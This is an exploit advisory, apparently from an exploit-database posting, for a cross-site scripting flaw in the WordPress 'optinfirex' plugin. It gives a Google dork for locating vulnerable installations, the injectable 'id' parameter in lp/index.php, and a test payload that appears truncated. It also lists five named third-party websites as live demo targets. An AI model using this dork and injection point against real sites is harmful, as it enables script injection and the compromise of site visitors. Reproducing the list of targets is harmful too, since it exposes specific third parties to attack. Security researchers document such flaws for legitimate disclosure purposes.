#******************************************************************************** # Exploit Title : Wordpress optinfirex plugin Cross site scripting # # Exploit Author : Ashiyane Digital Security Team # # Vendor Homepage : http://wordpress.org # # Google Dork : inurl :wp-content/plugins/optinfirex # # Date: 2013-11-26 # # Tested on: Windows 7 , Linux ------------------------------------------------------------------- # Exploit : Cross site scripting # # Location : [Target]wp-content/plugins/optinfirex/lp/index.php?id=[xss] # # Script For Test : "/> ###################### # Demo: # # http://www.avantmedispa.com/wp-content/plugins/optinfirex/lp/index.php?id= "/> # # http://www.inquestgroup.com/wp-content/plugins/optinfirex/lp/index.php?id= "/> # # http://www.drvictorchan.com/wp-content/plugins/optinfirex/lp/index.php?id= "/> # # http://www.obxwellness.com/wp-content/plugins/optinfirex/lp/index.php?id= "/> # # http://www.weightlosstips101.org/wp-content/plugins/optinfirex/lp/index.php?id= "/> # ###################### discovered by : ACC3SS ######################